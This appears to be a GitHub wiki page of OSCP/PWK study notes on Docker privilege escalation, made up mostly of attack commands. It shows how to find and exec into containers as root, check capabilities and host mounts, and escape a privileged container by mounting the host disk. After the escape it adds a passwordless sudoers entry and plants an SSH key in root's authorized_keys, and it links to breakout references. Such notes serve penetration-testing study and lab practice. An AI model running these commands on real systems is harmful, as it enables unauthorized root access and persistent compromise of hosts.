Docker - A1vinSmith/OSCP-PWK GitHub Wiki
exec -i -u root
sudo /snap/bin/docker exec -i -u root e6ff5b1cbc85
### Find container ID
ps aux | grep containerd-shim
ps aux | grep -E "docker|container"
Check for privilege escalation vectors inside the container:
cat /proc/self/status | grep Cap
mount | grep host
ls -la /mnt /media /host 2>/dev/null
If the container is privileged or has CAP_SYS_ADMIN, escape to host:
# Find host filesystem mount
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host # or similar device
# Modify host files
echo 'boris ALL=(ALL) NOPASSWD: ALL' >> /mnt/host/etc/sudoers
# or add SSH key
cp /root/.ssh/id_rsa.pub /mnt/host/root/.ssh/authorized_keys
Escape by using CAP
- https://hacktricks.wiki/en/linux-hardening/interesting-files-permissions/linux-capabilities.html
- https://blog.1nf1n1ty.team/hacktricks/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#mounting-disk-poc1
- https://securelayer7.net/learn/containers/what-is-a-privileged-container
Not docker,
But HTB data Grafana - https://hackviser.com/tactics/pentesting/services/grafana#ssrf-via-datasources